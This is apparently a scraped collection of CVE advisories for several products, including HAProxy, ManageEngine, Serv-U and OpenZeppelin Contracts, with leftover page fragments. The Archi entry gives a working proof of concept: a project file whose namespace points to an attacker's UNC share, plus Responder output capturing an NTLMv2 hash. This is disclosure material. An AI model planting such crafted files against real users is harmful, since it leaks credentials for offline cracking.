Uncontrolled search path element in some Intel(R) PSR SDK before version 1.0.0.20 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVE-2023-29151

Business Logic Errors in GitHub repository froxlor/froxlor prior to 2.0.22,2.1.0.

CVE-2023-4304: huntr – Security Bounties for any GitHub repository

When the app is put to the background and the user goes to the task switcher of iOS, the app snapshot is not blurred which may reveal sensitive information.


 

 Loading...

Skip to page contentSkip to chat

Skip to page contentSkip to chat

CVE-2023-37513: Knowledge Article View HCL - Customer Support

CVE-2023-37512: Knowledge Article View HCL - Customer Support

If certain App Transport Security (ATS) settings are set in a certain manner, insecure loading of web content can be achieved.


CVE-2023-37511: Knowledge Article View HCL - Customer Support


A vulnerability has been identified within Serv-U 15.4 that, if exploited, allows an actor to bypass multi-factor/two-factor authentication. The actor must have administrator-level access to Serv-U to perform this action. 



CVE-2023-35179

An NTLM Hash Disclosure was discovered in ArchiMate Archi before 5.1.0. When parsing the XMLNS value of an ArchiMate project file, if the namespace does not match the expected ArchiMate URL, the parser will access the provided resource. If the provided resource is a UNC path pointing to a share server that does not accept a guest account, the host will try to authenticate on the share by using the current user's session. NOTE: this issue occurs because Archi uses an unsafe configuration of the Eclipse Modeling Framework.

**Version of Archi**

5.0.2

**Description**

When parsing the XMLNS value of an archimate project file, if the namespace does not match the expected archimate URL, the parser will access the provided resource. If the provided resource is a UNC path pointing to a share server that does not accept guest account, the host will try to authenticate on the share using the current user's session.

**Impact**

A malicious user can capture NTLM hash of the authenticated user running the application. With the captured hashes, offline password cracking can be performed in order to guess the password and gain unauthorized access to the server.

**Technical fix**

Do not allow the application’s functionality to resolve or load UNC paths.

**Technical Details**

“archimate” project are saved as XML file using the extension .archimate . The below example is an archimate project with a single BusinessActor element (John Doe) present in the “Business” folder. That element is place on the diagram “Default View” (link by the ID  
e79145c...).

    <?xml version="1.0" encoding="UTF-8"?>
    <archimate:model xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:archimate="http://www.archimatetool.com/archimate" name="(new model)" id="id-81d2dc112d96489ea22c7f336df894cd" version="5.0.0">
      <folder name="Strategy" id="id-2ab87f8808194aafb76570f1480511a1" type="strategy"/>
      <folder name="Business" id="id-2e5d95fb12be42589b1e494dfc79dd2a" type="business">
        <element xsi:type="archimate:BusinessActor" name="John Doe" id="id-e79145cce35a4704a19ba22885cfc9d2"/>
      </folder>
      <folder name="Application" id="id-53a1acc2e38c4d7db125ccd25dc6892d" type="application"/>
      <folder name="Technology &amp; Physical" id="id-24c7dc79bf11478ea65391ef16835543" type="technology"/>
      <folder name="Motivation" id="id-dc391a764cd141d389af3b3b4a81a94a" type="motivation"/>
      <folder name="Implementation &amp; Migration" id="id-90400d4328f448779016a63ad6eab713" type="implementation_migration"/>
      <folder name="Other" id="id-276cb2473edf4874a5854257ed930166" type="other"/>
      <folder name="Relations" id="id-8a1f3df198fa44c7b271f846e4fa1d12" type="relations"/>
      <folder name="Views" id="id-bdcce9aa0bb64f4386ebc4ef4a90fa1b" type="diagrams">
        <element xsi:type="archimate:ArchimateDiagramModel" name="Default View" id="id-fb6015c3baa2446d90238f15a70a5adb">
          <child xsi:type="archimate:DiagramObject" id="id-be3e6f080b904e2496cf1d89f8965c15" archimateElement="id-e79145cce35a4704a19ba22885cfc9d2">
            <bounds x="571" y="332" width="120" height="55"/>
          </child>
        </element>
      </folder>
    </archimate:model>
    

The xmlns:archimate is pointing to http://www.archimatetool.com/archimate. However, if the value is modified, the parser will try to access the resource, and in case a UNC is provided, the host will try to access the share drive and if need be, try to authenticate.

In the following example, the attacker is running the Responder tool ( Responder.py) listening on the interface 172.16.227.1. The archimate project file is modified so that the xmlns:archimate is pointing to \\172.16.227.1\\share\\archimate.

    <?xml version="1.0" encoding="UTF-8"?>
    <archimate:model xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:archimate="\\172.16.227.1\share\archimate" name="(new model)" id="id-81d2dc112d96489ea22c7f336df894cd" version="5.0.0">
    [...]
    

Whenever the victim is opening the modified file, the application will try to access the resource via the host and authenticate on the fake SMB share created by Responder.py.

    sudo ./Responder.py -I vmnet8
    [...]
    [+] Listening for events...
    [...]
    [SMB] NTLMv2-SSP Client: 172.16.227.169
    [SMB] NTLMv2-SSP Username : LAB\tester
    [SMB] NTLMv2-SSP Hash:
    test::LAB:xxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxx[...]
    

As seen in the output above, the NTLM hash is leaked and could be used to crack the user's password.

CVE-2023-40235: NTLM Hash Disclosure (v5.0.2) · Issue #946 · archimatetool/archi

HAProxy through 2.0.32, 2.1.x and 2.2.x through 2.2.30, 2.3.x and 2.4.x through 2.4.23, 2.5.x and 2.6.x before 2.6.15, 2.7.x before 2.7.10, and 2.8.x before 2.8.2 forwards empty Content-Length headers, violating RFC 9110 section 8.6. In uncommon cases, an HTTP/1 server behind HAProxy may interpret the payload as an extra request.

CVE-2023-40225

Zoho ManageEngine Applications Manager through 16530 allows reflected XSS while logged in.

**Reflected XSS Vulnerability**  

Vulnerability Details

Severity

**High**

CVE ID

CVE-2023-38333

Affected software versions

Version 16530 and below

Fixed Version

Version 16367 to 16369  
Version 16424 to 16429  
Version 16512 to 16519  
Version 16540 and above

Fixed On

3 July 2023

**Details**

Reflected XSS Vulnerability in a login url allows attacker to craft a malicious JavaScript payload. When clicking the crafted url that is shared by an attacker, malicious JavaScript gets executed in the victim browser.

**Impact**

This vulnerability executes JavaScript in the victim's browser controlled by the attacker to carry out any of the actions that are applicable to the corresponding role of the victim in Applications Manager.

**Fix**

Applications Manager version 16540 and above fixes this issue by using proper defence mechanisms against Cross-Site Scripting(XSS) vulnerability.

**Steps to update**

Update your Applications Manager instance to the latest build using the service pack.

**Source and Acknowledgements**

Find out more about CVE-2023-38333 from CVE Directory and NIST NVD.

**Reported by:**

Anonymous working with Trend Micro Zero Day Initiative.

**Need Help?**

For clarification or corrections please contact our support team or email us at appmanager-support@manageengine.com

CVE-2023-38333: Security Updates - CVE Details - CVE-2023-38333

OpenZeppelin Contracts is a library for secure smart contract development. Starting in version 4.0.0 and prior to version 4.9.3, contracts using `ERC2771Context` along with a custom trusted forwarder may see `_msgSender` return `address(0)` in calls that originate from the forwarder with calldata shorter than 20 bytes. This combination of circumstances does not appear to be common, in particular it is not the case for `MinimalForwarder` from OpenZeppelin Contracts, or any deployed forwarder the team is aware of, given that the signer address is appended to all calls that originate from these forwarders. The problem has been patched in v4.9.3.


Expand Up

@@ -12,7 +12,7 @@ const ContextMockCaller = artifacts.require('ContextMockCaller');

const { shouldBehaveLikeRegularContext } \= require('../utils/Context.behavior');

  

contract('ERC2771Context', function (accounts) {

const \[, anotherAccount\] \= accounts;

const \[, trustedForwarder\] \= accounts;

  

const MAX\_UINT48 \= web3.utils.toBN(1).shln(48).subn(1).toString();

  

Expand Down Expand Up

@@ -84,11 +84,11 @@ contract('ERC2771Context', function (accounts) {

  

it('returns the original sender when calldata length is less than 20 bytes (address length)', async function () {

// The forwarder doesn't produce calls with calldata length less than 20 bytes

const recipient \= await ERC2771ContextMock.new(anotherAccount);

const recipient \= await ERC2771ContextMock.new(trustedForwarder);

  

const { receipt } \= await recipient.msgSender({ from: anotherAccount });

const { receipt } \= await recipient.msgSender({ from: trustedForwarder });

  

await expectEvent(receipt, 'Sender', { sender: anotherAccount });

await expectEvent(receipt, 'Sender', { sender: trustedForwarder });

});

});

  

Expand Down Expand Up

@@ -117,5 +117,15 @@ contract('ERC2771Context', function (accounts) {

await expectEvent.inTransaction(tx, ERC2771ContextMock, 'Data', { data, integerValue, stringValue });

});

});

  

it('returns the full original data when calldata length is less than 20 bytes (address length)', async function () {

// The forwarder doesn't produce calls with calldata length less than 20 bytes

const recipient \= await ERC2771ContextMock.new(trustedForwarder);

  

const { receipt } \= await recipient.msgDataShort({ from: trustedForwarder });

  

const data \= recipient.contract.methods.msgDataShort().encodeABI();

await expectEvent(receipt, 'DataShort', { data });

});

});

});